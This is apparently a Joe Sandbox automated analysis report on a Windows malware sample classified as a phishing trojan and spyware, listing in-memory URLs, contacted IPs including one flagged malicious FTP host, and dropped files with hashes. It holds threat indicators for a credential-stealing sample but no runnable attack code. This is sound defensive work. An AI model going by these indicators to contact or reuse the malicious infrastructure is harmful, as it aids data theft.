                                        http://whatismyipaddress.com/-pjavpo.exe, 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.galapagosdesign.com/DPleasepjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.site.com/logs.phppjavpo.exe, 00000005.00000002.493747770.0000000002801000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.zhongyicts.com.cnpjavpo.exe, 00000005.00000003.257123163.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.carterandcone.commgpjavpo.exe, 00000005.00000003.258100800.0000000004F9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.cssbhv8D09.tmp.13.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.google.com/complete/search?q&cp=0&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0&psbhv8D09.tmp.13.drfalse
                                              		high
                                              https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937bhv8D09.tmp.13.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5bhv8D09.tmp.13.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://www.google.com/complete/search?q&cp=0&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0&pqbhv8D09.tmp.13.drfalse
                                                		high
                                                https://www.google.com/search?source=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3kbhv8D09.tmp.13.drfalse
                                                  		high
                                                  https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eeebhv8D09.tmp.13.drfalse
                                                    		high
                                                    https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266ebhv8D09.tmp.13.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://cvision.media.net/new/300x300/2/41/100/83/b5cbfa68-1c93-41c9-8797-4f9b532bc0b6.jpg?v=9bhv8D09.tmp.13.drfalse
                                                      		high
                                                      https://www.google.com/chrome/static/images/download-browser/pixel_phone.pngbhv8D09.tmp.13.drfalse
                                                        		high
                                                        https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.pngbhv8D09.tmp.13.drfalse
                                                          		high
                                                          https://pki.goog/repository/0bhv8D09.tmp.13.drfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://www.msn.com/vbc.exe, 0000000D.00000003.325490889.000000000221A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.325673478.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.326155267.000000000221A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.325833599.0000000002215000.00000004.00000800.00020000.00000000.sdmp, bhv8D09.tmp.13.drfalse
                                                            		high
                                                            https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1bhv8D09.tmp.13.drfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://www.google.com/xjs/_/js/k=xjs.s.en_GB.u8fwEfmm86E.O/ck=xjs.s.hyRG9kR79v8.L.I11.O/m=IvlUebhv8D09.tmp.13.drfalse
                                                              		high
                                                              https://www.google.com/favicon.icobhv8D09.tmp.13.drfalse
                                                                		high
                                                                http://www.carterandcone.comlpjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.msn.com/bhv8D09.tmp.13.drfalse
                                                                  		high
                                                                  http://www.founder.com.cn/cn/rLpjavpo.exe, 00000005.00000003.255272980.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.255550167.0000000004F9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://nsis.sf.net/NSIS_ErrorTGQfHfehsY.exefalse
                                                                    		high
                                                                    https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpgbhv8D09.tmp.13.drfalse
                                                                      		high
                                                                      https://172.217.23.78/vbc.exe, 0000000D.00000003.328322633.000000000220D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.327668619.000000000222A000.00000004.00000800.00020000.00000000.sdmp, bhv8D09.tmp.13.drfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://www.google.com/images/nav_logo299.pngbhv8D09.tmp.13.drfalse
                                                                        		high
                                                                        https://www.google.com/chrome/static/images/fallback/icon-help.jpgbhv8D09.tmp.13.drfalse
                                                                          		high
                                                                          https://www.google.com/complete/search?q=c&cp=1&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0&bhv8D09.tmp.13.drfalse
                                                                            		high
                                                                            https://www.google.com/accounts/serviceloginpjavpo.exe, vbc.exefalse
                                                                              		high
                                                                              https://consent.google.com/set?pc=s&uxe=4421591bhv8D09.tmp.13.drfalse
                                                                                		high
                                                                                http://images.outbrainimg.com/transform/v3/eyJpdSI6ImYxODk5OTBhOWZjYjFmZjNjNmMxNDhmYjkzM2M3NzY1Mzk3Zbhv8D09.tmp.13.drfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://www.google.com/images/hpp/Chrome_Owned_96x96.pngbhv8D09.tmp.13.drfalse
                                                                                  		high
                                                                                  http://crl.pki.goog/gsr2/gsr2.crl0?bhv8D09.tmp.13.drfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://pki.goog/gsr2/GTSGIAG3.crt0)bhv8D09.tmp.13.drfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://googleads.g.doubleclick.net/adsid/google/ui?gadsid=AORoGNQP1yCl9r5iywZTFTjpazv-DURVxDidzMfrFbhv8D09.tmp.13.drfalse
                                                                                    		high
                                                                                    https://googleads.g.doubleclick.net/adsid/google/ui?gadsid=AORoGNSrZsXAj6n_sYvivJecwrpYgMhb9ihVGAlz2bhv8D09.tmp.13.drfalse
                                                                                      		high
                                                                                      https://www.google.com/chrome/static/images/fallback/icon-fb.jpgbhv8D09.tmp.13.drfalse
                                                                                        		high
                                                                                        https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.9Ky5Gf3gP0o.O/m=gapi_iframesbhv8D09.tmp.13.drfalse
                                                                                          		high
                                                                                          https://adservice.google.com/adsid/google/si?gadsid=AORoGNSvKHbjRugN8Bruw1IrFif72u8bwsJvZ4BRSrMAhil_bhv8D09.tmp.13.drfalse
                                                                                            		high
                                                                                            http://www.founder.com.cn/cn/bThepjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://ogs.google.com/widget/callout?prid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=httpsvbc.exe, 0000000D.00000003.325110381.000000000220D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.323407346.000000000222A000.00000004.00000800.00020000.00000000.sdmp, bhv8D09.tmp.13.drfalse
                                                                                              		high
                                                                                              https://www.google.com/complete/search?q=chrome&cp=6&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authusbhv8D09.tmp.13.drfalse
                                                                                                		high
                                                                                                https://www.google.com/images/phd/px.gifbhv8D09.tmp.13.drfalse
                                                                                                  		high
                                                                                                  https://www.google.com/chrome/static/images/homepage/google-canary.pngbhv8D09.tmp.13.drfalse
                                                                                                    		high
                                                                                                    https://adservice.google.co.uk/adsid/google/ui?gadsid=AORoGNQXg7AHkvg6J6S0TqGFa_0HynGV3_XxYfs4fLINJGbhv8D09.tmp.13.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.pngbhv8D09.tmp.13.drfalse
                                                                                                      		high
                                                                                                      https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.jsbhv8D09.tmp.13.drfalse
                                                                                                        		high
                                                                                                        https://www.google.com/chrome/static/js/main.v2.min.jsbhv8D09.tmp.13.drfalse
                                                                                                          		high
                                                                                                          https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbfbhv8D09.tmp.13.drfalse
                                                                                                            		high
                                                                                                            https://cvision.media.net/new/100x75/2/89/162/29/8ee7a9a3-dec9-4d15-94e1-5c73b17d2de1.jpg?v=9bhv8D09.tmp.13.drfalse
                                                                                                              		high
                                                                                                              http://www.typography.netDpjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              https://whatismyipaddress.comx&Qqtpjavpo.exe, 00000005.00000002.493747770.0000000002801000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		low
                                                                                                              http://fontfabrik.compjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              https://googleads.g.doubleclick.net/adsid/google/si?gadsid=AORoGNTXuGHPo1zFjYPXt7mTG-4GALGGk8bjqjvBmbhv8D09.tmp.13.drfalse
                                                                                                                		high
                                                                                                                https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2bhv8D09.tmp.13.drfalse
                                                                                                                  		high
                                                                                                                  https://www.google.com/intl/en_uk/chrome/bhv8D09.tmp.13.drfalse
                                                                                                                    		high
                                                                                                                    https://www.google.com/chrome/static/images/fallback/icon-youtube.jpgbhv8D09.tmp.13.drfalse
                                                                                                                      		high
                                                                                                                      https://googleads.g.doubleclick.net/adsid/google/si?gadsid=AORoGNQXwBwQrE_SUsnWzwpadcOOdc8yOg6JxthQNbhv8D09.tmp.13.drfalse
                                                                                                                        		high
                                                                                                                        https://www.google.com/intl/en_uk/chrome/application/x-msdownloadC:bhv8D09.tmp.13.drfalse
                                                                                                                          		high
                                                                                                                          http://www.sakkal.comuvpjavpo.exe, 00000005.00000003.266505711.0000000004F9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          http://images.outbrainimg.com/transform/v3/eyJpdSI6IjJkYTFhZDAwNDEyNzQ2M2E3MGUyMWVkZmIxNmUyZjQ2MjBkMbhv8D09.tmp.13.drfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          http://www.fonts.compjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://www.sandoll.co.krpjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            http://www.urwpp.depjavpo.exe, 00000005.00000003.274619011.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.270053098.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.274342061.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.274465406.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.269915108.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.274755127.0000000004F9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094bhv8D09.tmp.13.drfalse
                                                                                                                              		high
                                                                                                                              https://www.google.com/chrome/static/js/installer.min.jsbhv8D09.tmp.13.drfalse
                                                                                                                                		high
                                                                                                                                https://www.google.com/searchbhv8D09.tmp.13.drfalse
                                                                                                                                  		high
                                                                                                                                  https://www.google.com/chrome/static/images/download-browser/pixel_tablet.pngbhv8D09.tmp.13.drfalse
                                                                                                                                    		high
                                                                                                                                    http://whatismyipaddress.compjavpo.exe, 00000005.00000002.493747770.0000000002801000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJbhv8D09.tmp.13.drfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      https://www.google.com/images/icons/material/system/1x/email_grey600_24dp.pngbhv8D09.tmp.13.drfalse
                                                                                                                                        		high
                                                                                                                                        https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhv8D09.tmp.13.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		unknown
                                                                                                                                        https://www.google.com/chrome/static/images/homepage/google-beta.pngbhv8D09.tmp.13.drfalse
                                                                                                                                          		high
                                                                                                                                          http://www.msn.com/de-ch/?ocid=iehpbhv8D09.tmp.13.drfalse
                                                                                                                                            		high
                                                                                                                                            http://www.fontbureau.com/designers/cabarga.htmlNpjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://www.fontbureau.com91Spjavpo.exe, 00000005.00000002.493470447.0000000000B37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              http://www.founder.com.cn/cnpjavpo.exe, 00000005.00000003.255679895.0000000004F7C000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.254164186.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.254335364.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1bhv8D09.tmp.13.drfalse
                                                                                                                                                		high
                                                                                                                                                https://logincdn.msauth.net/16.000/content/js/OldConvergedLogin_PCore_xqcDwEKeDux9oCNjuqEZ-A2.jsbhv8D09.tmp.13.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                		unknown
                                                                                                                                                https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47bhv8D09.tmp.13.drfalse
                                                                                                                                                  		high
                                                                                                                                                  http://cookies.onetrust.mgr.consensu.org/onetrust-logo.svgbhv8D09.tmp.13.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://www.msn.com/http://www.google.com/ms-appx-web://microsoft.microsoftedge/ms-appx-web://microsvbc.exe, 0000000D.00000003.328802653.00000000027E8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.327613810.00000000027E8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.332890748.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.332406171.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.332307194.00000000009EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://support.google.com/accounts/answer/151657bhv8D09.tmp.13.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://logincdn.msauth.net/16.000.28230.00/images/microsoft_logo.svg?x=ee5c8d9fb6248c938fd0dc19370ebhv8D09.tmp.13.drfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      		unknown

                                                                                                                                                      World Map of Contacted IPs

                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                      Public IPs

                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                      104.16.154.36
                                                                                                                                                      		unknownUnited States
                                                                                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                                                                                      104.16.155.36
                                                                                                                                                      		whatismyipaddress.comUnited States
                                                                                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                                                                                      66.70.204.222
                                                                                                                                                      		ftp.manchutimefashion.comCanada
                                                                                                                                                      		16276OVHFRtrue

                                                                                                                                                      General Information

                                                                                                                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                      Analysis ID:587288
                                                                                                                                                      Start date:11.03.2022
                                                                                                                                                      Start time:11:55:11
                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 11m 6s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:light
                                                                                                                                                      Sample file name:TGQfHfehsY (renamed file extension from none to exe)
                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                      Number of analysed new started processes analysed:26
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • HDC enabled
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal100.phis.troj.spyw.evad.winEXE@9/7@4/3
                                                                                                                                                      EGA Information:
                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                      HDC Information:
                                                                                                                                                      • Successful, ratio: 57.7% (good quality ratio 54%)
                                                                                                                                                      • Quality average: 79.4%
                                                                                                                                                      • Quality standard deviation: 29.3%
                                                                                                                                                      HCA Information:
                                                                                                                                                      • Successful, ratio: 99%
                                                                                                                                                      • Number of executed functions: 0
                                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Adjust boot time
                                                                                                                                                      • Enable AMSI

                                                                                                                                                      Warnings

                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                      Simulations

                                                                                                                                                      Behavior and APIs

                                                                                                                                                      TimeTypeDescription
                                                                                                                                                      11:56:41API Interceptor5x Sleep call for process: pjavpo.exe modified

                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                      IPs

                                                                                                                                                      No context

                                                                                                                                                      Domains

                                                                                                                                                      No context

                                                                                                                                                      ASNs

                                                                                                                                                      No context

                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                      No context

                                                                                                                                                      Dropped Files

                                                                                                                                                      No context

                                                                                                                                                      Created / dropped Files

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\6kvziwv34i

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\Desktop\TGQfHfehsY.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):604671
                                                                                                                                                      Entropy (8bit):7.973798757569864
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:T4lEobWACXsG1DDymxzOy/8zCgkBzQq+CpcB2rvfDpcWkzU:TqqsCzpUzeRDrg2Lbpn
                                                                                                                                                      MD5:2573C20C1EE479A24A987AF35F211BB2
                                                                                                                                                      SHA1:393BD88475B88060D847ABEFAEBFCCEA79065F09
                                                                                                                                                      SHA-256:48BA86A86EC2091F3642FFD0B85850948E9FD9E010F655DB316D910958FA6C10
                                                                                                                                                      SHA-512:9FA143233525497A44C793AF24ECFE130FF52D87207D0162128BDFE066C915DDD50012CA8C7FCF3A65B2A4397FE6C331FACED703DE2BBE3BF2A587EBCB9F2B81
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview:..xF..4S..?S.&.a.".."}.B=4..GF.C..(. uKJ..s..b2......m.<..V..V`.u.L..M..E......U.+).%....s^..FwKH}...a..!vRv.4.Y.#`..C.b.[.41....1#.~.i.KQ..?.t.E.iSY.fz..%...~g`+Ph...O|.b..s.y.e.[...+..vg.`Hwc\X....s~..Q...K4......*..p.L..'.......6a>..X......].F2.41..?......"}.B=4..&..X4..y. ..J..s.,.2......m.o.TV...L...e.M..AJ..c7....u.1...A,.d....4XC#..Z....gt..&.O.C...[...M.UC....J..t...P.....a..%p7".J.....?.4...].......J)7o./+.!.....<....,...2T`7*.z.d..~.`.$... w...{.....O.%.....X..........4.O.?..&.[."..T"}.B=4..GF.C..(..f...I.s.n.2.....1m.o..V...L.\.......AJ~y.O.T...j..1.0xA,!d..R1yXC..o.....t_.&..f...d[..M.U.G.h..J........pUH.a..%^7"..Bm..?y....8..z......)7o./+.!..........,...2.m~*jz.d..~.`.$.l..-....{.....O.%.....X......].F2.4,..?..&.[.".."}.B=4..GF.C..(. uKJ..s..b2......m.o..V...L.\.......AJ....7....u.1...A,.d....yXC..o.....t..&.O.C.b.[...M.UC..h%.J..t.....pUH.a..%p7".J.....?.4...]..z.c...J)7o./+.!.....<....,...2.m~*jz.d..~.`.$.l..-..

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\bhv8D09.tmp

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x08024e91, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):29884416
                                                                                                                                                      Entropy (8bit):1.0184073286529858
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24576:o717t8HVmySw781FfXy7R4aUpP9dCr6f63rsLOZ:O5y2ry
                                                                                                                                                      MD5:2E5E8398FB582B15CF9132DD4D6E514C
                                                                                                                                                      SHA1:73A4C046E9F770AA88A9B1E35340A830A49E3372
                                                                                                                                                      SHA-256:8A63D15EC2399D9BBECFF27E85D20504492C35937045F8269E88F96AD510F716
                                                                                                                                                      SHA-512:014A8981081AB8D184A01D91D2BA446541FDA211B6887CCBED32D19908B8767BF67E9A340315D953B4C3780F5FE3A29AB12F418D8ECD1FF837AB09DBB2947EFD
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview:..N.... ........?......_e..*....w........................=......+...z..87...zq.h.?.........................b...*....w..............................................................................................{............B.................................................................................................................. ........8...z+......................................................................................................................................................................................................................................g..'8...z..................(/?t&8...z..........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\brtwja

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\Desktop\TGQfHfehsY.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):5087
                                                                                                                                                      Entropy (8bit):6.133390541408052
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:CS6ccaYloOHiRZ+NtVTGumefqv7/IrDDA/qGpFfJ5zOxa+sWfo:Xca+oOCRZ+NtVTZyrI7JMBzOxQWfo
                                                                                                                                                      MD5:0E0E6772DEA62ECCFA391D48D9BF6CD4
                                                                                                                                                      SHA1:FF5EA5E7BFF8A12041D42209021B4AB205A22EF7
                                                                                                                                                      SHA-256:8FE770D252DB864492B6FCE6ADED5AE8D34DB22413FBCA2E221AB84A60C2DE90
                                                                                                                                                      SHA-512:A67E8FDC6CE829AC14B45B33E91A7B1E3CE6A3EAE002D90041C24F73C3374C977E441A309ECB227E1DDE246FA596360FC8CAB3C0AAAC7261B04281AA1C508A1C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview:(....l>%V%..krV....r....|!.r....|)V....|.....V.........D|.q)....H|.Hl.......D|.q))...H|.Hl.......D|.q)....H|.Hl.......D|.q)S...H|.Hl.V......y....|.8H|!Hl.>|.V)...H|)H.%>|)>..D....x..>|).l.D..H|.rkH..V....)....V........x...w....y....x..!z..)s<.....>....H...V#.......w>|..H|...).....}.....V....>..sz>|.zsn>.t...l>%pp.r....|.>|.>..|..>|.>.>..>..Hl.>}..H|.>|.>..>..H.>|.>l.>.t........)....)............)....)u........u..)m...).......l>%V%..r....|).|.....D|.H|.V.....>|....>|..H|.>|..H|...)....<..{>|.8..x...H}..Hm..D|)8..x. .H}..Hm......y...D}..q.....)....q)....H|...D|)q...)....H|.V.....V......|.....>|.>.t...l>%V%..r....|).|.....D|.H|.V.....>|....>|..H|.>|..H|...)....<..=G...>|.8..x...H}..Hm..>|.8..x. .H}..Hm..>|.8..x. H}..Hm..>|.....w...H}..H...D|)8..x. .H}..Hm......y...D}..q.....)....q)6...H|.V.....>|)>..H..................)....H|.V.....V......|.....>|.>.t...l>%V%..|.....D|.H|.V.....>|....>|..H|.>|..H|...)....<..{>|.8..x...H}..Hm.)>|.8..x. .H}..Hm.)....y...D}..q..u..)....q)....H|.....

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\holderwb.txt

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                      File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2
                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Qn:Qn
                                                                                                                                                      MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                      SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                      SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                      SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                                      Preview:..

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\pjavpo.exe

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\Desktop\TGQfHfehsY.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):120320
                                                                                                                                                      Entropy (8bit):6.316729871952652
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:I5MMCnkgeOdoWzkEXu/1X9fkYL1DMlSgqBDrTrRinUQh1DE4Ph7pcrnB16sWjcdC:IMMuBeMR2/NdRJSoXRih0B1lw/
                                                                                                                                                      MD5:1294A9DDC96CAC3F16FAE32EA9D6670D
                                                                                                                                                      SHA1:CE3E4B59E66E3A4B55BC86D3091BF7DC812FAAFF
                                                                                                                                                      SHA-256:D3FE02905ABE00EBB65EEF308C700B923487EE8805EA529A2A4E65A953955E59
